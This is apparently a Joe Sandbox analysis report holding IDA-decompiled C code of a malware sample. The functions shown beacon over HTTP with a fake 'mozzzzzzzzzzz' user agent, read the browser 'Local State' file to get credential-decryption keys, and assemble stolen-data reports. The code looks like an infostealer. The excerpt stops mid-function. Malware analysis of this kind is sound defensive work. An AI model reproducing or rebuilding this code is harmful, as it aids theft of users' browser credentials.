                                                                                                                                                                        				long _v12;
                                                                                                                                                                        				long _v16;
                                                                                                                                                                        				WCHAR* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				void* _v28;
                                                                                                                                                                        				void* _v32;
                                                                                                                                                                        				void* _t49;
                                                                                                                                                                        				void* _t53;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				int _t76;
                                                                                                                                                                        				void* _t85;
                                                                                                                                                                        				void* _t89;
                                                                                                                                                                        				int _t94;
                                                                                                                                                                        				int _t97;
                                                                                                                                                                        				long _t98;
                                                                                                                                                                        				void* _t101;
                                                                                                                                                                        				void* _t102;
                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                        				long _t107;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t115;
                                                                                                                                                                        				void* _t118;
                                                                                                                                                                        				WCHAR* _t120;
                                                                                                                                                                        				void* _t121;
                                                                                                                                                                        				void* _t124;
                                                                                                                                                                        				short* _t125;
                                                                                                                                                                        				signed short* _t126;
                                                                                                                                                                        				void* _t127;
                                                                                                                                                                        				void* _t128;
                                                                                                                                                                        				int _t130;
                                                                                                                                                                        
                                                                                                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                                                                                                        				_t125 = __ecx; // executed
                                                                                                                                                                        				_t49 = LocalAlloc(0x40, 0xc350); // executed
                                                                                                                                                                        				_t102 = _t49;
                                                                                                                                                                        				_t120 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_v32 = _t120;
                                                                                                                                                                        				if( *_t125 != 0x68) {
                                                                                                                                                                        					L24:
                                                                                                                                                                        					return 0;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t53 = 0x74;
                                                                                                                                                                        				if( *((intOrPtr*)(_t125 + 2)) != _t53 ||  *((intOrPtr*)(_t125 + 4)) != _t53 ||  *((short*)(_t125 + 6)) != 0x70) {
                                                                                                                                                                        					goto L24;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_v16 =  *(_t125 + 8) & 0x0000ffff;
                                                                                                                                                                        					_t56 =  *((intOrPtr*)( *0x40e18c))(_t125,  *0x40e3ec);
                                                                                                                                                                        					_v12 = 0x2f;
                                                                                                                                                                        					_t115 = 0;
                                                                                                                                                                        					_t10 = _t56 + 6; // 0x6
                                                                                                                                                                        					_t126 = _t10;
                                                                                                                                                                        					_t57 =  *_t126 & 0x0000ffff;
                                                                                                                                                                        					_t104 = _t57;
                                                                                                                                                                        					if(_t57 == _v12) {
                                                                                                                                                                        						L7:
                                                                                                                                                                        						_t59 =  *((intOrPtr*)( *0x40e08c))(_t120);
                                                                                                                                                                        						_v20 =  &(_t126[_t59]);
                                                                                                                                                                        						_t127 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _a4, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        						_t20 = _t127 + 0x40; // 0x40
                                                                                                                                                                        						_t107 =  *((intOrPtr*)( *0x40e044))(0x40, _t20);
                                                                                                                                                                        						_v12 = _t107;
                                                                                                                                                                        						if(_t127 == 0) {
                                                                                                                                                                        							L9:
                                                                                                                                                                        							_t66 = InternetOpenW(L"mozzzzzzzzzzz", 0, 0, 0, 0); // executed
                                                                                                                                                                        							_t128 = _t66;
                                                                                                                                                                        							_v24 = _t128;
                                                                                                                                                                        							if(_t128 == 0) {
                                                                                                                                                                        								L20:
                                                                                                                                                                        								_t109 = MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(0) + 1, _t102, 0);
                                                                                                                                                                        								_v28 = _t109;
                                                                                                                                                                        								if(_t109 == 0) {
                                                                                                                                                                        									_t130 = _v8;
                                                                                                                                                                        								} else {
                                                                                                                                                                        									_t121 = _t109 + _t109;
                                                                                                                                                                        									_t76 =  *((intOrPtr*)( *0x40e044))(0x40, _t121);
                                                                                                                                                                        									_v8 = _t76;
                                                                                                                                                                        									MultiByteToWideChar(0xfde9, 0, _t102,  *((intOrPtr*)( *0x40e198))(_v28) + 1, _t102, _t76);
                                                                                                                                                                        									_t130 = _v8;
                                                                                                                                                                        									 *((short*)(_t121 + _t130 - 2)) = 0;
                                                                                                                                                                        								}
                                                                                                                                                                        								LocalFree(_v12);
                                                                                                                                                                        								LocalFree(_v32);
                                                                                                                                                                        								LocalFree(_t102);
                                                                                                                                                                        								return _t130;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(1);
                                                                                                                                                                        							_push(0);
                                                                                                                                                                        							_t83 =  ==  ? 0x1bb : 0;
                                                                                                                                                                        							_t84 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
                                                                                                                                                                        							_t85 = InternetConnectW(_t128, _t120, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3); // executed
                                                                                                                                                                        							_t118 = _t85;
                                                                                                                                                                        							_v28 = _t118;
                                                                                                                                                                        							if(_t118 == 0) {
                                                                                                                                                                        								L19:
                                                                                                                                                                        								InternetCloseHandle(_t128);
                                                                                                                                                                        								goto L20;
                                                                                                                                                                        							}
                                                                                                                                                                        							_push(1);
                                                                                                                                                                        							_t88 =  ==  ? 0xc00000 : 0x400000;
                                                                                                                                                                        							_t89 = HttpOpenRequestW(_t118,  *0x40e25c, _v20, 0, 0, _a12,  ==  ? 0xc00000 : 0x400000, 0x73); // executed
                                                                                                                                                                        							_t124 = _t89;
                                                                                                                                                                        							if(_t124 == 0) {
                                                                                                                                                                        								L18:
                                                                                                                                                                        								InternetCloseHandle(_v28);
                                                                                                                                                                        								goto L19;
                                                                                                                                                                        							}
                                                                                                                                                                        							_t94 = HttpSendRequestW(_t124, _a8,  *((intOrPtr*)( *0x40e08c))( *((intOrPtr*)( *0x40e198))(_v12)), _a8, _v12); // executed
                                                                                                                                                                        							if(_t94 == 0) {
                                                                                                                                                                        								L17:
                                                                                                                                                                        								InternetCloseHandle(_t124); // executed
                                                                                                                                                                        								_t128 = _v24;
                                                                                                                                                                        								goto L18;
                                                                                                                                                                        							}
                                                                                                                                                                        							while(1) {
                                                                                                                                                                        								_t97 = InternetReadFile(_t124, _t102, 0xc350,  &_v16); // executed
                                                                                                                                                                        								if(_t97 == 0) {
                                                                                                                                                                        									goto L17;
                                                                                                                                                                        								}
                                                                                                                                                                        								_t98 = _v16;
                                                                                                                                                                        								if(_t98 == 0) {
                                                                                                                                                                        									goto L17;
                                                                                                                                                                        								}
                                                                                                                                                                        								 *((char*)(_t98 + _t102)) = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							goto L17;
                                                                                                                                                                        						}
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t127);
                                                                                                                                                                        						_push(_t107);
                                                                                                                                                                        						_push(0xffffffff);
                                                                                                                                                                        						_push(_a4);
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(0xfde9);
                                                                                                                                                                        						if( *((intOrPtr*)( *0x40e0e4))() == 0) {
                                                                                                                                                                        							goto L24;
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L9;
                                                                                                                                                                        					}
                                                                                                                                                                        					_t101 = 0;
                                                                                                                                                                        					do {
                                                                                                                                                                        						_t115 = _t115 + 1;
                                                                                                                                                                        						 *(_t101 + _t120) = _t104;
                                                                                                                                                                        						_t101 = _t115 + _t115;
                                                                                                                                                                        						_t104 =  *(_t101 + _t126) & 0x0000ffff;
                                                                                                                                                                        					} while (_t104 != _v12);
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        			}





































                                                                                                                                                                        0x00407c6d
                                                                                                                                                                        0x00407c7b
                                                                                                                                                                        0x00407c7d
                                                                                                                                                                        0x00407c84
                                                                                                                                                                        0x00407c93
                                                                                                                                                                        0x00407c95
                                                                                                                                                                        0x00407c98
                                                                                                                                                                        0x00407ed4
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407ed4
                                                                                                                                                                        0x00407ca0
                                                                                                                                                                        0x00407ca5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407cc0
                                                                                                                                                                        0x00407cca
                                                                                                                                                                        0x00407cd3
                                                                                                                                                                        0x00407cd5
                                                                                                                                                                        0x00407cdc
                                                                                                                                                                        0x00407cde
                                                                                                                                                                        0x00407cde
                                                                                                                                                                        0x00407ce1
                                                                                                                                                                        0x00407ce4
                                                                                                                                                                        0x00407cea
                                                                                                                                                                        0x00407d00
                                                                                                                                                                        0x00407d06
                                                                                                                                                                        0x00407d17
                                                                                                                                                                        0x00407d2c
                                                                                                                                                                        0x00407d2e
                                                                                                                                                                        0x00407d36
                                                                                                                                                                        0x00407d38
                                                                                                                                                                        0x00407d3d
                                                                                                                                                                        0x00407d5f
                                                                                                                                                                        0x00407d6f
                                                                                                                                                                        0x00407d71
                                                                                                                                                                        0x00407d73
                                                                                                                                                                        0x00407d78
                                                                                                                                                                        0x00407e52
                                                                                                                                                                        0x00407e70
                                                                                                                                                                        0x00407e72
                                                                                                                                                                        0x00407e77
                                                                                                                                                                        0x00407eb4
                                                                                                                                                                        0x00407e79
                                                                                                                                                                        0x00407e7e
                                                                                                                                                                        0x00407e84
                                                                                                                                                                        0x00407e97
                                                                                                                                                                        0x00407ea6
                                                                                                                                                                        0x00407ea8
                                                                                                                                                                        0x00407ead
                                                                                                                                                                        0x00407ead
                                                                                                                                                                        0x00407eba
                                                                                                                                                                        0x00407ec3
                                                                                                                                                                        0x00407eca
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407ed0
                                                                                                                                                                        0x00407d7e
                                                                                                                                                                        0x00407d88
                                                                                                                                                                        0x00407d9c
                                                                                                                                                                        0x00407d9f
                                                                                                                                                                        0x00407da5
                                                                                                                                                                        0x00407da7
                                                                                                                                                                        0x00407da9
                                                                                                                                                                        0x00407dae
                                                                                                                                                                        0x00407e4b
                                                                                                                                                                        0x00407e4c
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e4c
                                                                                                                                                                        0x00407db4
                                                                                                                                                                        0x00407dcd
                                                                                                                                                                        0x00407de2
                                                                                                                                                                        0x00407de4
                                                                                                                                                                        0x00407de8
                                                                                                                                                                        0x00407e42
                                                                                                                                                                        0x00407e45
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e45
                                                                                                                                                                        0x00407e0e
                                                                                                                                                                        0x00407e12
                                                                                                                                                                        0x00407e38
                                                                                                                                                                        0x00407e39
                                                                                                                                                                        0x00407e3f
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e3f
                                                                                                                                                                        0x00407e26
                                                                                                                                                                        0x00407e32
                                                                                                                                                                        0x00407e36
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e1b
                                                                                                                                                                        0x00407e20
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e22
                                                                                                                                                                        0x00407e22
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407e26
                                                                                                                                                                        0x00407d46
                                                                                                                                                                        0x00407d47
                                                                                                                                                                        0x00407d48
                                                                                                                                                                        0x00407d49
                                                                                                                                                                        0x00407d4a
                                                                                                                                                                        0x00407d4c
                                                                                                                                                                        0x00407d4f
                                                                                                                                                                        0x00407d50
                                                                                                                                                                        0x00407d59
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407d59
                                                                                                                                                                        0x00407cec
                                                                                                                                                                        0x00407cee
                                                                                                                                                                        0x00407cee
                                                                                                                                                                        0x00407cef
                                                                                                                                                                        0x00407cf3
                                                                                                                                                                        0x00407cf6
                                                                                                                                                                        0x00407cfa
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00407cee

                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,0000C350,00000000,00000000,00000000,?,?,?), ref: 00407C7D
                                                                                                                                                                        • InternetOpenW.WININET(mozzzzzzzzzzz,00000000,00000000,00000000,00000000), ref: 00407D6F
                                                                                                                                                                        • InternetConnectW.WININET(00000000,00000000,?,00000000,00000000,00000003,00000000,00000001), ref: 00407DA5
                                                                                                                                                                        • HttpOpenRequestW.WININET(00000000,?,00000000,00000000,?,00400000,00000001), ref: 00407DE2
                                                                                                                                                                        • HttpSendRequestW.WININET(00000000,?,00000000), ref: 00407E0E
                                                                                                                                                                        • InternetReadFile.WININET(00000000,00000000,0000C350,?), ref: 00407E32
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00407E39
                                                                                                                                                                        • InternetCloseHandle.WININET(?), ref: 00407E45
                                                                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 00407E4C
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407E6E
                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,00000001), ref: 00407EA6
                                                                                                                                                                        • LocalFree.KERNEL32(0000002F), ref: 00407EBA
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00407EC3
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00407ECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Internet$Local$CloseFreeHandle$ByteCharHttpMultiOpenRequestWide$AllocConnectFileReadSend
                                                                                                                                                                        • String ID: /$mozzzzzzzzzzz
                                                                                                                                                                        • API String ID: 1268748717-9660103
                                                                                                                                                                        • Opcode ID: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
                                                                                                                                                                        • Instruction ID: 677f3e060cdc4141eea8ad2591dda170fc442a0e6149e7f0a8c7285b1f3b2b30
                                                                                                                                                                        • Opcode Fuzzy Hash: 1b3c63f6ad7b7c56e05ea6f413d6885c404e8ecc1f31910e50c1ca249fd4186c
                                                                                                                                                                        • Instruction Fuzzy Hash: 0F71BF71A00215BFEB149BA5CD45F7B77B8EB48700F04847AFA14FB2D0D6B4AD508BA9
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E00401C87(WCHAR* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr* _a12, void* _a16) {
                                                                                                                                                                        				WCHAR* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				long _v20;
                                                                                                                                                                        				long _v24;
                                                                                                                                                                        				void* _t35;
                                                                                                                                                                        				void* _t42;
                                                                                                                                                                        				int _t50;
                                                                                                                                                                        				void* _t56;
                                                                                                                                                                        				void* _t66;
                                                                                                                                                                        				struct _OVERLAPPED* _t73;
                                                                                                                                                                        				void* _t74;
                                                                                                                                                                        				void* _t77;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				long _t81;
                                                                                                                                                                        				void* _t93;
                                                                                                                                                                        				void* _t96;
                                                                                                                                                                        				intOrPtr* _t98;
                                                                                                                                                                        				void* _t99;
                                                                                                                                                                        				intOrPtr _t100;
                                                                                                                                                                        				intOrPtr* _t101;
                                                                                                                                                                        				intOrPtr _t102;
                                                                                                                                                                        				intOrPtr* _t103;
                                                                                                                                                                        
                                                                                                                                                                        				_v12 = __edx;
                                                                                                                                                                        				_t73 = 0;
                                                                                                                                                                        				_v8 = __ecx;
                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                        				_t35 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				_t96 = _t35;
                                                                                                                                                                        				_v16 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        				if(_a16 != 0) {
                                                                                                                                                                        					_push(__ecx);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					PathCombineW(_t96, __ecx, _v12);
                                                                                                                                                                        					_push(_t96);
                                                                                                                                                                        				}
                                                                                                                                                                        				_t98 = _a4;
                                                                                                                                                                        				 *_t98 =  *((intOrPtr*)( *0x40e13c))( *_t98);
                                                                                                                                                                        				_t99 = _v16;
                                                                                                                                                                        				PathCombineW(_t99, _v8, L"Local State");
                                                                                                                                                                        				_t42 = CreateFileW(_t99, 0x80000000, 1, _t73, 3, _t73, _t73); // executed
                                                                                                                                                                        				_t77 = _t42;
                                                                                                                                                                        				_v12 = _t77;
                                                                                                                                                                        				_t78 =  *((intOrPtr*)( *0x40e14c))(_t77, _t73);
                                                                                                                                                                        				_a16 = _t78;
                                                                                                                                                                        				_t93 =  *((intOrPtr*)( *0x40e044))(0x40, _t78);
                                                                                                                                                                        				_v8 = _t93;
                                                                                                                                                                        				_t50 = ReadFile(_v12, _t93, _a16 - 1,  &_v20, _t73); // executed
                                                                                                                                                                        				if(_t50 != 0) {
                                                                                                                                                                        					_t81 = _a16 + _a16;
                                                                                                                                                                        					_v24 = _t81;
                                                                                                                                                                        					_t56 = LocalAlloc(0x40, _t81); // executed
                                                                                                                                                                        					_t100 =  *0x40e1f4; // 0x6f04e8
                                                                                                                                                                        					_a16 = _t56;
                                                                                                                                                                        					E0040A16F(E0040A4C2(_v8), _t100,  &_a16,  &_a16); // executed
                                                                                                                                                                        					_push(_a16);
                                                                                                                                                                        					if( *((intOrPtr*)( *0x40e08c))() > 0) {
                                                                                                                                                                        						_t101 = _a8;
                                                                                                                                                                        						 *_t101 =  *((intOrPtr*)( *0x40e13c))( *_t101, _a16); // executed
                                                                                                                                                                        						LocalFree(_a16); // executed
                                                                                                                                                                        						_t66 = LocalAlloc(0x40, _v24); // executed
                                                                                                                                                                        						_t102 =  *0x40e200; // 0x6eda60
                                                                                                                                                                        						_a16 = _t66;
                                                                                                                                                                        						E0040A16F(E0040A4C2(_v8), _t102,  &_a16,  &_a16); // executed
                                                                                                                                                                        						_t74 = _a16;
                                                                                                                                                                        						if(_t74 != 0) {
                                                                                                                                                                        							_t103 = _a12;
                                                                                                                                                                        							 *_t103 =  *((intOrPtr*)( *0x40e13c))( *_t103, _t74); // executed
                                                                                                                                                                        							LocalFree(_t74); // executed
                                                                                                                                                                        						}
                                                                                                                                                                        						_t73 = 1;
                                                                                                                                                                        					}
                                                                                                                                                                        					FindCloseChangeNotification(_v12); // executed
                                                                                                                                                                        					_t99 = _v16;
                                                                                                                                                                        				}
                                                                                                                                                                        				LocalFree(_t99); // executed
                                                                                                                                                                        				LocalFree(_t96);
                                                                                                                                                                        				LocalFree(_v8); // executed
                                                                                                                                                                        				return _t73;
                                                                                                                                                                        			}


























                                                                                                                                                                        0x00401c9c
                                                                                                                                                                        0x00401c9f
                                                                                                                                                                        0x00401ca1
                                                                                                                                                                        0x00401ca6
                                                                                                                                                                        0x00401ca9
                                                                                                                                                                        0x00401cb0
                                                                                                                                                                        0x00401cbb
                                                                                                                                                                        0x00401cc1
                                                                                                                                                                        0x00401cd1
                                                                                                                                                                        0x00401cc3
                                                                                                                                                                        0x00401cc8
                                                                                                                                                                        0x00401cce
                                                                                                                                                                        0x00401cce
                                                                                                                                                                        0x00401cd2
                                                                                                                                                                        0x00401ce6
                                                                                                                                                                        0x00401ce8
                                                                                                                                                                        0x00401cec
                                                                                                                                                                        0x00401d04
                                                                                                                                                                        0x00401d06
                                                                                                                                                                        0x00401d0f
                                                                                                                                                                        0x00401d14
                                                                                                                                                                        0x00401d1e
                                                                                                                                                                        0x00401d29
                                                                                                                                                                        0x00401d2f
                                                                                                                                                                        0x00401d3c
                                                                                                                                                                        0x00401d40
                                                                                                                                                                        0x00401d4e
                                                                                                                                                                        0x00401d53
                                                                                                                                                                        0x00401d56
                                                                                                                                                                        0x00401d5b
                                                                                                                                                                        0x00401d61
                                                                                                                                                                        0x00401d72
                                                                                                                                                                        0x00401d7e
                                                                                                                                                                        0x00401d85
                                                                                                                                                                        0x00401d87
                                                                                                                                                                        0x00401d99
                                                                                                                                                                        0x00401d9b
                                                                                                                                                                        0x00401dab
                                                                                                                                                                        0x00401db0
                                                                                                                                                                        0x00401db6
                                                                                                                                                                        0x00401dc7
                                                                                                                                                                        0x00401dcc
                                                                                                                                                                        0x00401dd3
                                                                                                                                                                        0x00401dd5
                                                                                                                                                                        0x00401de3
                                                                                                                                                                        0x00401de5
                                                                                                                                                                        0x00401de5
                                                                                                                                                                        0x00401ded
                                                                                                                                                                        0x00401ded
                                                                                                                                                                        0x00401df1
                                                                                                                                                                        0x00401df7
                                                                                                                                                                        0x00401df7
                                                                                                                                                                        0x00401dfb
                                                                                                                                                                        0x00401e02
                                                                                                                                                                        0x00401e0b
                                                                                                                                                                        0x00401e17

                                                                                                                                                                        APIs
                                                                                                                                                                        • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 00401CC8
                                                                                                                                                                        • PathCombineW.SHLWAPI(?,?,Local State), ref: 00401CEC
                                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00401D04
                                                                                                                                                                        • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00401D3C
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00401D56
                                                                                                                                                                        • LocalFree.KERNELBASE(?), ref: 00401D9B
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00401DAB
                                                                                                                                                                        • LocalFree.KERNELBASE(?), ref: 00401DE5
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(?), ref: 00401DF1
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401DFB
                                                                                                                                                                        • LocalFree.KERNEL32(00000000), ref: 00401E02
                                                                                                                                                                        • LocalFree.KERNEL32(?), ref: 00401E0B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000E.00000002.455885894.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000E.00000002.456238055.0000000000410000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_14_2_400000_F0geI.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$Free$AllocCombineFilePath$ChangeCloseCreateFindNotificationRead
                                                                                                                                                                        • String ID: Local State
                                                                                                                                                                        • API String ID: 4164476917-22827320
                                                                                                                                                                        • Opcode ID: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
                                                                                                                                                                        • Instruction ID: e8ea5197d75d1b9ffa148ce1658a92dc358bcbabd267189588b6ee53365c4b7a
                                                                                                                                                                        • Opcode Fuzzy Hash: b89154720f445bf51b2e96a239cc4b3d4fa919ccbd2c9594b8aa0e9c2ba5a7c7
                                                                                                                                                                        • Instruction Fuzzy Hash: B95141B5600215EFEB04DFA5DE85AAE7BB9EF48300F104829F915F7250D774AD20CB69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 23%
                                                                                                                                                                        			E00409906(void* _a4, short* _a8) {
                                                                                                                                                                        				void* _v8;
                                                                                                                                                                        				void* _v12;
                                                                                                                                                                        				void* _v16;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				signed int _v28;
                                                                                                                                                                        				char _v32;
                                                                                                                                                                        				void* _v36;
                                                                                                                                                                        				char _v60;
                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                        				signed int _t55;
                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                        				void* _t64;
                                                                                                                                                                        				signed int _t67;
                                                                                                                                                                        				void* _t71;
                                                                                                                                                                        				void* _t78;
                                                                                                                                                                        				void* _t100;
                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                        				void* _t107;
                                                                                                                                                                        				void* _t108;
                                                                                                                                                                        				void* _t109;
                                                                                                                                                                        				void* _t110;
                                                                                                                                                                        				void* _t111;
                                                                                                                                                                        				void* _t112;
                                                                                                                                                                        				void* _t126;
                                                                                                                                                                        				signed int _t127;
                                                                                                                                                                        				signed int _t133;
                                                                                                                                                                        				void* _t144;
                                                                                                                                                                        				char _t149;
                                                                                                                                                                        				void* _t158;
                                                                                                                                                                        				void* _t162;
                                                                                                                                                                        				signed int _t163;
                                                                                                                                                                        				void* _t164;
                                                                                                                                                                        				void* _t166;
                                                                                                                                                                        				void* _t168;
                                                                                                                                                                        				void* _t173;
                                                                                                                                                                        				void* _t174;
                                                                                                                                                                        				signed int _t179;
                                                                                                                                                                        				void* _t184;
                                                                                                                                                                        
                                                                                                                                                                        				_t127 = 0;
                                                                                                                                                                        				_t53 =  *((intOrPtr*)( *0x40e18c))(_a4,  *0x40e430, _t162, _t126);
                                                                                                                                                                        				_t163 = _t53;
                                                                                                                                                                        				if(_t163 != 0) {
                                                                                                                                                                        					_t164 = _t163 + 0x10;
                                                                                                                                                                        					_t55 =  *((intOrPtr*)( *0x40e18c))(_t164,  *0x40e1f0);
                                                                                                                                                                        					__eflags = _t55;
                                                                                                                                                                        					if(_t55 == 0) {
                                                                                                                                                                        						L5:
                                                                                                                                                                        						_v16 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t164, _t174) + _t57);
                                                                                                                                                                        						_t60 = E0040A3E4(_t164,  &_v16, 0, _t127);
                                                                                                                                                                        						__eflags = _t60;
                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                        							_t166 = _t164 + _t127 * 2 + 2;
                                                                                                                                                                        							_t64 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t166) + _t62);
                                                                                                                                                                        							_v8 = _t64;
                                                                                                                                                                        							_t179 =  *((intOrPtr*)( *0x40e18c))(_t166,  *0x40e20c) - _t166 >> 1;
                                                                                                                                                                        							_t67 = E0040A3E4(_t166,  &_v8, 0, _t179);
                                                                                                                                                                        							__eflags = _t67;
                                                                                                                                                                        							if(_t67 != 0) {
                                                                                                                                                                        								_t168 = _t166 + _t179 * 2 + 2;
                                                                                                                                                                        								_t71 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t168) + _t69);
                                                                                                                                                                        								_v12 = _t71;
                                                                                                                                                                        								__eflags = E0040A3E4(_t168,  &_v12, 0,  *((intOrPtr*)( *0x40e18c))(_t168,  *0x40e20c) - _t168 >> 1);
                                                                                                                                                                        								if(__eflags != 0) {
                                                                                                                                                                        									_t78 = LocalAlloc(0x40, 0x5000); // executed
                                                                                                                                                                        									_a4 =  *((intOrPtr*)( *0x40e13c))(_t78, _v8);
                                                                                                                                                                        									E00409064(__eflags,  &_a4);
                                                                                                                                                                        									E0040919C( &_a4); // executed
                                                                                                                                                                        									E004090DC( *0x40e13c,  &_a4); // executed
                                                                                                                                                                        									E00409265( &_a4);
                                                                                                                                                                        									E004092CF( &_v12,  &_a4); // executed
                                                                                                                                                                        									E0040942A( &_a4); // executed
                                                                                                                                                                        									E00409206(__eflags,  &_a4);
                                                                                                                                                                        									E00409498( &_a4);
                                                                                                                                                                        									E00409581(__eflags,  &_a4, _v12); // executed
                                                                                                                                                                        									_t144 = _a4;
                                                                                                                                                                        									_v36 = _v16;
                                                                                                                                                                        									_v32 = _t144;
                                                                                                                                                                        									_v28 = 0;
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                        									_t100 =  *((intOrPtr*)( *0x40e08c))(_t144);
                                                                                                                                                                        									__eflags = _t100 - 0x40;
                                                                                                                                                                        									if(_t100 > 0x40) {
                                                                                                                                                                        										_t107 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t108 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
                                                                                                                                                                        										_t158 = 0x10;
                                                                                                                                                                        										_t109 = E0040A05F(_t107, _t158);
                                                                                                                                                                        										_v24 = _t109;
                                                                                                                                                                        										_t110 =  *((intOrPtr*)( *0x40e13c))(_t108,  *0x40e210);
                                                                                                                                                                        										_t173 = _v24;
                                                                                                                                                                        										_t111 = E0040A503(_t110, _t173);
                                                                                                                                                                        										_t149 =  *0x40e204; // 0x6d5b78
                                                                                                                                                                        										_v28 = _v28 & 0x00000000;
                                                                                                                                                                        										_v32 = _t149;
                                                                                                                                                                        										_v24 = _t111;
                                                                                                                                                                        										_t112 = E00408619( &_v24);
                                                                                                                                                                        										_v20 = _t112;
                                                                                                                                                                        										_t184 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
                                                                                                                                                                        										 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, 0, 0, 0, 0);
                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                        										if(0 != 0) {
                                                                                                                                                                        											 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t173, 0xffffffff, _t184, 0, 0, 0);
                                                                                                                                                                        											__eflags = 0;
                                                                                                                                                                        											if(0 != 0) {
